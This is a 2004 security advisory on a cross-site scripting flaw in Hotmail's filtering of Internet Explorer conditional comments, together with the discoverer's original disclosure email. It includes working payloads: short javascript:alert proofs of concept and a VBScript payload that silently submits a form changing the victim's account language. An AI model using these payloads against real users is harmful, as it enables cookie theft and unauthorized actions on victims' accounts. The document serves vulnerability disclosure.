Hotmail HTML Comment Conditional IF Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1010726
|
|
SecurityTracker URL: http://securitytracker.com/id?1010726
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jul 19 2004
|
Original Entry Date: Jul 17 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
|
Exploit Included: Yes
|
Description: An input validation vulnerability was reported in Hotmail in the processing of HTML comments. A remote user can conduct cross-site scripting attacks against target users via Internet Explorer.
Paul at GreyHats Security Group reported that Hotmail does not properly filter HTML code from HTML comments in HTML-based e-mail.
A remote user can send specially crafted e-mail that, when viewed by a target Hotmail user with Internet Explorer, will cause arbitrary
scripting code to be executed by the target user's browser. The code will originate from the Hotmail site and will run in the security
context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),
if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on
the site acting as the target user.
According to the report, Hotmail does not filter scripting code from within conditional
IF statements contained in HTML comments. Microsoft Internet Explorer will execute the conditional IF statement.
A demonstration
exploit is provided:
<!--[if !gte mso 1337]><img src="javascript:alert('XSS haha!')"><![endif]-->
GreyMagic Software subsequently
clarified that the flaw is associated with the Microsoft Internet Explorer conditional IF feature and not just with the Microsoft
Office (mso) version number. A demonstration exploit is provided:
<!--[if IE gte 5]> <img src="javascript:alert()"> <![endif]-->
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the Hotmail site,
access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.hotmail.com/ (Links to External Site)
|
Cause: Input validation error
|
Reported By: Paul <paul@greyhats.cjb.net>
|
Message History:
None.
|
Source Message Contents
|
Date: 15 Jul 2004 23:16:07 -0000
From: Paul <paul@greyhats.cjb.net>
Subject: Hotmail Cross Site Scripting Vulnerability
|
Note: This vulnerability as well as several more can be found at http://greyhats.cjb.net
Hotmail Cross Site Scripting Vulnerability
[Tested]
IEXPLORE.EXE file version 6.0.2800.1106
MSHTML.DLL file version 6.00.2800.1400
Hotmail Version [who knows]
[Discussion]
I think it's been a while since we gave hotmail a little challenge don't you? Well here it is :). A b
rand spankin' new XSS vulnerability
is available for use in hotmail and probably hotmail only.
Try this: Create a document in MS Word and put in a couple things like pictures and whatnot. Then sav
e it as a webpage. Through all
that clutter you'll see something like this:
<!--[if gte mso 9]> some stuff <![endif]-->
That's like some cool little checker for certain features in the user's browser.
What does that do for us? Well, Hotmail was just nice enough to be a little lenient on what goes in-b
etween those 'if' tags. I suppose
that's so MS Word can send stuff through email to Hotmail customers without it getting messed up.
Unfortunatly, they forgot one thing: Script! Let's put together some nice little 'if' tag. The 'if' t
ag above checks if ms office
'9' is installed. Something cool about these 'if' tags is that you can use an exclamation mark ('!')
to check is something is not
something else. So I'll use <!--[if !gte mso 1337]>. I'm pretty sure they don't have an MS Off
ice 1337 out yet ;). So let's start
checking stuff. Apparently,
<!--[if !gte mso 1337]><script>alert('XXS haha!');</script><![en
dif]-->
doesnt work. But lets try this:
<!--[if !gte mso 1337]><img src="javascript:alert('XSS haha!')"><![endif]-->
Well whatta ya know. It works :).
As far as I know, you can use anything in-between the 'if' tags that you want except <script&
gt;. The example script below changes
the victim's hotmail language to chinese upon viewing of the message from a browser.
<html><body><!--[if !gte mso 1337]>
<IMG src='vbscript:document.write("<html>" & vbcrlf & "<head>"
& vbcrlf & "<form name=""language"" method=""POST""
action=""/cgi-bin/dolang"">"
& vbcrlf & "<input type=""hidden"" name=""curmbox""
value=""F000000001"">" & vbcrlf & "<input type=""
hidden"" name=""HrsTest"" value="""">"
& vbcrlf & "<input type=""hidden"" name=""id""
value=""2"">" & vbcrlf & "<input type=""hidden""
name=""cb"" value=""_lang=EN&country=US"">"
& vbcrlf & "<input type=""hidden"" name=""ref""
value="""">" & vbcrlf & "<input type=""hidden""
name=""Language"" value=""CN"" >"
& vbcrlf & "<input type=""hidden"" name=""OK.x""
value="" OK "">" & vbcrlf & "I hope you can read chinese :)"
& vbcrlf & "</form>"
& vbcrlf & "<s"&"cript language=""vbs"&"cript"">"
& vbcrlf & "document.language.submit()" & vbcrlf & "</sc"&"
ript>")'>
<![endif]-->
|
|
